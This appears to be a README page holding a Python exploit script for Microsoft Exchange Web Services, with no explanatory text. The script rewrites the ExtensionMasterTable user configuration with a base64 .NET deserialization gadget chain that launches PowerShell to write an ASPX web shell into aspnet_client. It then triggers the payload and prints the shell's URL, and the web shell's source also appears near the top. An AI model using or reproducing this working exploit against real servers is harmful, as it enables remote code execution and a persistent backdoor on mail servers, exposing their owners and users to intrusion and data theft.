README.md
Rendering markdown...
#!/usr/bin/python
import socket, time
import httplib, requests
import urllib
import os, ssl
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import base64
'''
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
'''
target = "https://10.0.0.52"
# write a webshell to aspnet_client
gadgetData = 'AAEAAAD/////AQAAAAAAAAAMAgAAAAhtc2NvcmxpYgwDAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAY1N5c3RlbS5EYXRhLkRhdGFTZXQsIFN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoAAAAWRGF0YVNldC5SZW1vdGluZ0Zvcm1hdBNEYXRhU2V0LkRhdGFTZXROYW1lEURhdGFTZXQuTmFtZXNwYWNlDkRhdGFTZXQuUHJlZml4FURhdGFTZXQuQ2FzZVNlbnNpdGl2ZRJEYXRhU2V0LkxvY2FsZUxDSUQaRGF0YVNldC5FbmZvcmNlQ29uc3RyYWludHMaRGF0YVNldC5FeHRlbmRlZFByb3BlcnRpZXMURGF0YVNldC5UYWJsZXMuQ291bnQQRGF0YVNldC5UYWJsZXNfMAQBAQEAAAACAAcfU3lzdGVtLkRhdGEuU2VyaWFsaXphdGlvbkZvcm1hdAMAAAABCAEIAgIAAAAF/P///x9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AQAAAAd2YWx1ZV9fAAgDAAAAAQAAAAYFAAAAAAkFAAAACQUAAAAACQQAAAAKAQAAAAkGAAAADwYAAAD2BQAAAgABAAAA/////wEAAAAAAAAADAIAAABeTWljcm9zb2Z0LlBvd2VyU2hlbGwuRWRpdG9yLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAQk1pY3Jvc29mdC5WaXN1YWxTdHVkaW8uVGV4dC5Gb3JtYXR0aW5nLlRleHRGb3JtYXR0aW5nUnVuUHJvcGVydGllcwEAAAAPRm9yZWdyb3VuZEJydXNoAQIAAAAGAwAAAJgKPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIgLUVuY29kZWRDb21tYW5kIFV3QmxBSFFBTFFCREFHOEFiZ0IwQUdVQWJnQjBBQ0FBTFFCUUFHRUFkQUJvQUNBQUp3QkRBRG9BWEFCcEFHNEFaUUIwQUhBQWRRQmlBRndBZHdCM0FIY0FjZ0J2QUc4QWRBQmNBR0VBY3dCd0FHNEFaUUIwQUY4QVl3QnNBR2tBWlFCdUFIUUFYQUF4QUM0QVlRQnpBSEFBZUFBbkFDQUFMUUJXQUdFQWJBQjFBR1VBSUFBbkFEd0FKUUJBQUNBQVVBQmhBR2NBWlFBZ0FFd0FZUUJ1QUdjQWRRQmhBR2NBWlFBOUFDSUFTZ0JUQUdNQWNnQnBBSEFBZEFBaUFDQUFSQUJsQUdJQWRRQm5BRDBBSWdCMEFISUFkUUJsQUNJQUpRQStBRHdBSlFCQUFFa0FiUUJ3QUc4QWNnQjBBQ0FBVGdCaEFHMEFaUUJ6QUhBQVlRQmpBR1VBUFFBaUFGTUFlUUJ6QUhRQVpRQnRBQzRBU1FCUEFDSUFKUUErQUR3QUpRQkdBR2tBYkFCbEFDNEFWd0J5QUdrQWRBQmxBRUVBYkFCc0FFSUFlUUIwQUdVQWN3QW9BRklBWlFCeEFIVUFaUUJ6QUhRQVd3QWlBR0lBSWdCZEFDd0FJQUJEQUc4QWJnQjJBR1VBY2dCMEFDNEFSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FGSUFaUUJ4QUhVQVpRQnpBSFFBV3dBaUFHRUFJZ0JkQUNrQUtRQTdBQ1VBUGdBbkFBPT0iIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0icG93ZXJzaGVsbC5leGUiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4LCw=='
def sendPayload(gadgetChain):
get_inbox = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:GetFolder>
<m:FolderShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:FolderShape>
<m:FolderIds>
<t:DistinguishedFolderId Id="inbox" />
</m:FolderIds>
</m:GetFolder>
</soap:Body>
</soap:Envelope>
'''
try:
headers = {"User-Agent": "ExchangeServicesClient/15.01.2308.008", "Content-type" : "text/xml; charset=utf-8"}
print("[+] show AllProperties")
res = requests.post(target + "/ews/exchange.asmx",
data=get_inbox,
headers=headers, verify=False,proxies={"https":"127.0.0.1:8080"})
folderId = res.content.split('<t:FolderId Id="')[1].split('"')[0]
changeKey = res.content.split('<t:FolderId Id="' + folderId + '" ChangeKey="')[1].split('"')[0]
print("[+] folderId: "+ folderId)
print("[+] changeKey: "+ changeKey)
except Exception as e:
print(str(e))
print("[-] show AllProperties failed.")
delete_old = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:DeleteUserConfiguration>
<m:UserConfigurationName Name="ExtensionMasterTable">
<t:FolderId Id="%s" ChangeKey="%s" />
</m:UserConfigurationName>
</m:DeleteUserConfiguration>
</soap:Body>
</soap:Envelope>''' % (folderId, changeKey)
try:
print("[+] DeleteUserConfiguration")
res = requests.post(target + "/ews/exchange.asmx",
data=delete_old,
headers=headers,
verify=False,
proxies={"https":"127.0.0.1:8080"})
except Exception as e:
print(str(e))
print("[-] DeleteUserConfiguration failed.")
create_usr_cfg = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:CreateUserConfiguration>
<m:UserConfiguration>
<t:UserConfigurationName Name="ExtensionMasterTable">
<t:FolderId Id="%s" ChangeKey="%s" />
</t:UserConfigurationName>
<t:Dictionary>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgChkTm</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Integer64</t:Type>
<t:Value>637728170914745525</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgDO</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Boolean</t:Type>
<t:Value>False</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgExtV</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Integer32</t:Type>
<t:Value>2147483647</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
</t:Dictionary>
<t:BinaryData>%s</t:BinaryData>
</m:UserConfiguration>
</m:CreateUserConfiguration>
</soap:Body>
</soap:Envelope>''' % (folderId, changeKey, gadgetChain)
try:
print("[+] CreateUserConfiguration")
res = requests.post(target + "/ews/exchange.asmx",
data=create_usr_cfg,
headers=headers,
verify=False,
proxies={"https":"127.0.0.1:8080"})
except Exception as e:
print(str(e))
print("[-] CreateUserConfiguration failed.")
get_client_ext = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:GetClientAccessToken>
<m:TokenRequests>
<t:TokenRequest>
<t:Id>aaaa</t:Id>
<t:TokenType>CallerIdentity</t:TokenType>
</t:TokenRequest>
</m:TokenRequests>
</m:GetClientAccessToken>
</soap:Body>
</soap:Envelope>
'''
try:
print("[+] Execute BinaryData")
res = requests.post(target + "/ews/exchange.asmx",
data=get_client_ext,
headers=headers,
verify=False,
proxies={"https":"127.0.0.1:8080"},timeout=15)
time.sleep(10)
print("[*] webshell: " + target+"/aspnet_client/1.aspx")
except Exception as e:
print(str(e))
print("[-] Execute BinaryData failed. Checking the Av or WAF.")
sendPayload(gadgetData)